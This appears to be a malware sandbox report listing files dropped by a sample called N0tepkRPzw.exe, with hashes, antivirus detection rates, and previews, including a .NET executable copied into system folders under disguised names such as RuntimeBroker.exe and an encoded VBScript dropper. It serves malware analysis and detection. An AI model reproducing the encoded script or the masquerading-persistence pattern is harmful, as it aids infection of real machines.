SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Lang\c4950d50751633

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with very long lines (659), with no line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.876370512065259
Encrypted:	false
SSDEEP:	12:/v600XShRGvHx3r9vxZ+ylkT8EjpKHRL+k0OU8dxHiZFdNfYJOC3HCoZgTT:/v60TMnsylD+d4WnNfRCSSE
MD5:	0BB1ACAF1AD9F293A7EB3DB53DD3AD26
SHA1:	BC6F71E531316ADAF8DC2F4F4BCFE187879AFA35
SHA-256:	40DA884C3F6A4E7047A4775881122DA0D677F712EF18DAA98A3DBD1AD8C2E144
SHA-512:	5271740E41B2C9CD5CEE9BA3EB33F48AEDD6AFE23254C16B9E994CAA241837092A0EB03827C3D19900543F7D6436DDDAA1749F26FD2686A5E47C57FC45A3F494
Malicious:	false
Preview:	CzGHLuxEAoq4ya9CP9SFkkFqFrAkQU7wI3TVQdkD7JTfApQOE4AYtnEbuZCduMypr4v5GnvvZPIbQjpZbwgVUiDfz1l0bHTuUnxG4UHaJO9eemLLtnB7qdVJ1PGPC5US6YGmvjfHoFLGiiAMqZGxFVD0SoOoO2XN3qiGgiZKI4TkROkSO3jmyhMkUPTHU02ws8M1A4qHA6pLCcjDD6ZUTuZWd7wQOSzRCh2TCsRUNbm21Bi1qPDYbhc7i0XDIZ2sGXJekPBUpEH1IgebY4j9Ob0eE4uLUOMxj4ve2DRbOstWalzCW6oO03dphoaqez9b2TRNuAjVmIvfseDdEszYj87qbG7Onl6YtRdHTmRWWTlrH77Dl7lw9k14WlwoCUrBMWwaA6JcadBQXPieJ3nq9JYIajvsznTClkfuKgCoxJWgilhGCSeJrBBC8o9aLbnwK9oxtxTm1820x2jyCopgIJUjidwfgmdVgjVj7tXO82RsJLOGELXhvGoApFOPBxFOfhUOgA1SRbiQ2laXPpaVO6ja5U32fHNLxDNl09jETEPUiYIDo1AVWtAj74TMG9xJNWdyYygPGWBJqP1gL0NoG1yDDno6qX8URFGL5TozUuPAs03sCwAPvJCViZvuJkjsYr2kIql1MXTWmyUMu63

C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft OneDrive\c4950d50751633

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	67
Entropy (8bit):	5.084381167908259
Encrypted:	false
SSDEEP:	3:OoNUBkv/ReDBL3n:V6SHReDBLn
MD5:	B3BFEFA7A61402EF5EA770A564ADCBDE
SHA1:	7A0BF6CA739828C9F451F32B9841363ED806B32F
SHA-256:	14728CC7F396D9C2739D0B69827489AFBB309D2C192D0A03ACDF2DDB27F044BD
SHA-512:	0BBD1BDE859639957E2CE1798535898AA4EF345B628D36923EA5E4E92C15FA8B3F82F4251BA2EEA8EB70683DCF5485A974DC2474CA53E42C1CFCC027020EB17C
Malicious:	false
Preview:	jKOYxovBhyVrhXs0EcQnhnt6QhQAnjRDm3nP4iXnrYO6fKkUXpnxytf5bRIPXuY7gRF

C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\c4950d50751633

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with very long lines (900), with no line terminators
Category:	dropped
Size (bytes):	900
Entropy (8bit):	5.902480922685692
Encrypted:	false
SSDEEP:	24:nQ1fJbzE3db8gBUDUqR8IjQxApAcCrO06WRw77wUkGOPTVQe4:nKbkxUDBuIjQBcsO07RLLVa
MD5:	E1E33CB397871C9E55F73DA1C0D4B83D
SHA1:	D6D15D7F96EE1A17613703703B6B7ABE71B81EBB
SHA-256:	39072C33937805BF4F759748506B87BBF56DC1CDA5CC69C43716A81137A1D7CC
SHA-512:	0342DE7CCCBFCBC2734760AE321BEBD831C2DBCD7C81C1F14EB831DAEC606F17A54D2678058ACA41E8F0533E8FA6183AF816F47FC1527DE422702B8EA8E6CD86
Malicious:	false
Preview:	puLglA8SjVKIDY0qtuEjANqpVqIuhXDGTSrjKFMUObWisOoKRWB2a83cDfL51OvMREyvqQgohuUi0I6GB8cKWKqVYPfo4QcApKQoZ3eBzXVpnUm4jE43wk0HXdWbv1uRSU2p2SrIeaV8zArEmkFzWjOFUJQ6gCQ8mEXTb6CQXvYVP1RWwSyKw44tGxVtBulbKXVvnYmqiyckK2zd14KOOGLsJoMolTPmK7K2fgtYpIl8bUiN821HkXNELnl9L8EOizaMs67VLviFeNQzF8psbIBxtFr14tMrDWZm4VfB4f6yyHk8Ww4NSWxaxmdnPFbbj1CHyo5tdny6MN9metfHz8Yrj8yR22wyEeO6EdJs1Kuoi1Okn0IgkTlldVhz0n0k191r8ChBjwQoNtJsuNnCtPNu2ndt6U2NTJxi9gmkTG7yC6XtMyFm9y1lvGyUjxFO4DVE6ktNkDsnSZs5QthHPPNfSLx2rSBfBs39lSxlF1C6FOTVY3DzQ79oz0wvx0fSBNljgsU765CXNRZE1bdyOLODtOKvgByOVt52mtzqiG3U5lbiar3VWrE08h0Riia4HyCdWhbImxPHS4IHxlUzHd1opE3E2iIAp8NGj7M3Pvtjb6iEYte6Nlwo6XyRoXPEpPcTrCizZbjWuSNtgzqJDMxDLjJLJ5P2go4LdOXWKpgvCa3oKEuyrFAccYHH2WpeMq0FXBPSbT8YqBBvpeBFLaLaobtFGPex9BjVkyRIzbXXGlwaXWcXVkTweZb6RJLMzLYocpK0N2PtDyTCoSsuwGcZsx1KXU1pQKi5NI8rLlJdUjtqGYR9bbZst95oyAd3Bkd2PXzgTAiL68FJEKE8D2Nzu0MNNT3LIQctG0bsjvpa2Ovu4wko6ezJWoHZLlS9HWCq

C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\Favorites\c4950d50751633

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	216
Entropy (8bit):	5.741305750336543
Encrypted:	false
SSDEEP:	6:DhDbofHBK83nyQDtM4i8eMJ6RI0jxr3ln:1bYBKwnySeSeMJ6RIq9l
MD5:	85B7E5600954DF5ADFA0F0E475B5B763
SHA1:	0AAA2FE15ECA4F3AF9215641D5072FD4A51C1218
SHA-256:	69C6090A2644E15AF6DA9691B4F4E4FC551F7E1C92FA9A8BA65ACBDC2D52253B
SHA-512:	8F145D26E04B7AFEFDCD8A523B194F11167B849BE15346EFD2F80ED63D2C0A93453407606AA04C9A26D3D6D8FBB11867F938D7D198F072F627E67E67FA315C4C
Malicious:	false
Preview:	x6fEcTbsPPoaSXcsCh7cpSgMFNitX5kEi6jrlUsR1R2GYPO8kfqxbzheaT9PurVTpj2WxuGrzqkYZZxz9kI2OwnsYFRSUdgK5ibyW1K0Y88vOJEAfKQKidF26K7scyXVJac078cHaSdPy1dPARwKNWlbdj2M3cYklnlyqNChrItQAzEEqsrKCNIwzBXYGPN742oLPpiwOPcEmVbnfxgKuNiX

C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\blockServerruntime.exe.log

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
MD5:	FE86BB9E3E84E6086797C4D5A9C909F2
SHA1:	14605A3EA146BAB4EE536375A445B0214CD40A97
SHA-256:	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
SHA-512:	07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qVUjshNEHYUOCXyHyUMQwFlZoe.exe.log

Download File

Process:	C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Windows\Provisioning\Packages\c4950d50751633

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with very long lines (929), with no line terminators
Category:	dropped
Size (bytes):	929
Entropy (8bit):	5.90527354015349
Encrypted:	false
SSDEEP:	24:GDUxcW3VgjWq8buSSRtUFJNhSvIPvnUYqATkwc0yvXhr7UzZ5:8LW3tZSsFYQPvnGwYvxXUt5
MD5:	67A662A1A087CB97046BA1F2E4B4A27D
SHA1:	7B7461C30A034A53F638AD0B7FF91872D98214A2
SHA-256:	BBE9AC6E604A79997B9A9BE079BF05D622A6BBB8232186A884EDF46298F79DB9
SHA-512:	7A289429931E3045708A023622A2B5479FC3FD924058342CE35BD586DCF05A8CBB5EE33B5202FDDE0DFA51FBE6200611EF015CC2A20F2FFDF340848D0DA6913C
Malicious:	false
Preview:	Glm1IjUwWQCq0Uioy42vwMLZsFTiDn8Em9rir7K7wImpq3dEXQnpxYJ4aMICQvssR7D0m961u58njgszmOLxASRO0xIfyHrBa3XszmcYUw52afU3dTaBj4s8pzAy0bCnN6NpI99AwwdOXZyUdOBeqqbfLZD9lnh3tRodSoveUaOxbdlQBqUlZi6hesdt69YIOjfFuUCzdhKQboDsxw85S6dKUH8jKChUCGi18ffrnfI2YqG0ov5KBczSGUvnWcoa9zNVGLtSRRRwykwnBI5YGWTjQPvou2UL1r2icvtcCn3uKDefhHmOhPUngoE0aEhY6G5HrOKQYcWddiYNvPGnPGolWPByq3C7FexEHWyT6WzE30J8Q1EK74JzbTucNWjfZYY9vTFZbxq3RjsgGDhyy1AKU7mymWGjwUofcKM6vptKOQi2lNVJyurhYNoxrRwFrHG64MD50lDIIz6EYuMYA6uCmHHOgZPe3ocGJm7YKaTNriZiRjY6FXEvWEUxFyZbWiOeWz4wwxOkmhUDri76ASZfjruFSJTVA21IT4LbolJRJeIytQFg1daDJt5pFzeme2juqMtwXgSYIHWEi5WBEwehbx8k9gWzGgwQ5YIhgSJVLB4BX0GJdcirYCS2NJx1JcSlVFJJxyfvnJWa26NJZNWn8F22GPUWfSLstTqRr6Vo7wEOq19Q5nb6GonPNQDieIQV7nrjP6cc1rqLBnMOPDb10PmFpbDa3xJygsQCKaA9L9EY7bOjDySarYesBl3y2BiEi2oSWKEzDbq1LNIOMdXFetGINiAigLHKa90Ew6N2tdXQrnhxdpmYodjywgEyKfS1UgbLXDbQQeVBV0akBMF1jsf6ZBSQ1ZsOLg5LMVaaNWHKIid6Fex7aaSlAevWvKY1vG0y4PYpwpnNlVy1hVLWlvyuOUKrk

C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\addins\9e8d7a4ca61bd9

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with very long lines (921), with no line terminators
Category:	dropped
Size (bytes):	921
Entropy (8bit):	5.893413562442376
Encrypted:	false
SSDEEP:	24:VRAa4yPtRBTQgVCVA0cNqPdB0AUSXcUmSdaVNbQcJQ4t4:0utX19O0NSXcZSkVNtt4
MD5:	10545AE0D579F04EE12FF018BD80CC61
SHA1:	6E274BB3B299431C900FCA3FA950AC8C7E795A9F
SHA-256:	08D266057ED4408AA081DDCA1B7445B2F2F9DA437CA141A406344D7AB3DF7C72
SHA-512:	D9D287B1D67000F287B052C2C792C35C431653A708AB0F5779DA04CEF33F5E90993D9CE5CF694C653D276B6E10CA0ADB28389BB7667B7F823AD1C6BD33F0B463
Malicious:	false
Preview:	6wuDKejt3StCNrTQqaq26kyAJ09Tbl8fAzQvnaoeFGuIs1ioy5MYTR8V8u4TfQRRTNCYahnQvMxzzpSRSUegZkMs05w2gV9yydzfzKOQS6mHeJfTcmBKwv2sBThfvutaM8AW0wcHGNOd8EOrZda4UyCDkGdgnsfiML4gIJdpJ3EihZu6FzGRTzGX57vtS6eXspQwJrjQAvuaudfLWhaxmOPXFhkKXtWNZq01I7xXQ0RhEqncbkXvfruea3qmHY2QZhAEnoDYuDgw7rSZ4IsxWkss5WaPQKP27AHhpjyxg8BbK8htlRs9pF4zySIRNyHjxnz6kuuVT5QYiQh7yrn9cQN1GStWagks0cnhJkI0hWpuzgQhvKcfKIGha80SBX4wUhhGnAyOjxbFlcBkBLkQEFisVGGLu0zJc2ZS8J4vWO5XqA576PQzxnsO8yvg3nes7RntDtl1Qz4zJLBULIOek9WyJKTJYY1suNZYXM4NoYj7t2FxxaVvY9I75yj2Zbd27LF6vm78NBzLaZEQFfW8CFTuFbdimCxM5r9ixIBKcWhXJ6hgtSw3Fez11U0UIYVLNnQtZgd7eLfpi5kJ37zTP3Ha1HqcRrCEAWKgpyGNzzZ39JT5uraLjC5Ufz1RzBpxJboLvEdF0leaeNbryusjQ1f8azA06zXyKmuheHKpOVU7hf0SXKdFTFgS5qu5DmIAOqQ1c3MqkCV5gib59scwWSeFFclyXOlmMTs0O8ze7xeQukvXOz5VKWo6LLv9RYTWattMzkrB28yjxOUfrOjhSQbzowpDMzMjdIzA1iioH4cMhFI70QSDyvDKR3hD5nyCvOFpYUnIq5ZXxPSjnsN6hIvsEpt7AeteFaaS9digmKX3VpWCl8aMa2fndWkskpHLL5SXy9jJJqTWv2XYTrWCEgDN4

C:\Windows\addins\RuntimeBroker.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat

Download File

Process:	C:\Users\user\Desktop\N0tepkRPzw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.1491706083099515
Encrypted:	false
SSDEEP:	3:I53ADVMRHcXZEGOhROLAEn:IiDVQI+ROJn
MD5:	D3FD56DED9966D3B3A1BBF6AD396C114
SHA1:	2B3D4E14F8902ACFEE37E419A56725907854E4FF
SHA-256:	6DDB2EA308D6FE828E8E466B1B89A15D0B4E628C09FDE818375932E869567816
SHA-512:	18A4B024C2D66B9F868DBB7A02EF115CB202032CE1B7140481324FE1794FBA54A06A58419A74583F25F24C71A1C0298D73767969E5E369119F0CDBF3534A79BC
Malicious:	false
Preview:	"C:\bridgeportserver\blockServerruntime.exe"

C:\bridgeportserver\blockServerruntime.exe

Download File

Process:	C:\Users\user\Desktop\N0tepkRPzw.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
SSDEEP:	24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
MD5:	A6A0FB77338508B4185FE94263AA2D0F
SHA1:	0410A23443DE08D9CA311D2AEF1264232D4014A4
SHA-256:	5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
SHA-512:	D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\bridgeportserver\u0vIoi.vbe

Download File

Process:	C:\Users\user\Desktop\N0tepkRPzw.exe
File Type:	data
Category:	dropped
Size (bytes):	220
Entropy (8bit):	5.797882130410325
Encrypted:	false
SSDEEP:	6:Gh0wqK+NkLzWbHK/818nZNDd3RL1wQJRcUdjLIzFxOPPCt1Y:GhFMCzWLKG4d3XBJ26LIzSyjY
MD5:	3E1CAF4771BE829DA924FF455DA48E03
SHA1:	12E8D477E1A09A72142CFF6888D7397097B60F43
SHA-256:	CF5AAE2AC65F7E59A64C06D82E700C33D8A2B01564F7620F2328DAF8D14E2822
SHA-512:	1639E4B66DAD75288E21291705EEFED5BEE54FC477BFF681782902CC92D3C845B2D3E0AD5EBD4A603004FC47C0002D6B400AAEB0C980248AC2C441DF2CC8DAA2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^wwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4.bNT+wKDDd+M\nDJ%UsTDcyKbIn\|TA}M;b`f0rUzzh3R(CYr~~TBP0Csk+Oj4AAA==^#~@.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.497784504595164
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	N0tepkRPzw.exe
File size:	1'806'983 bytes
MD5:	4b173aaa031de977353ca903f23520e4
SHA1:	56261520faf4c58a72be2edcff1c65a011896e16
SHA256:	da46d37c422bf241bd3dabbc8846d9f94e3d2b7f3e80e17d70bcc6eb13161630
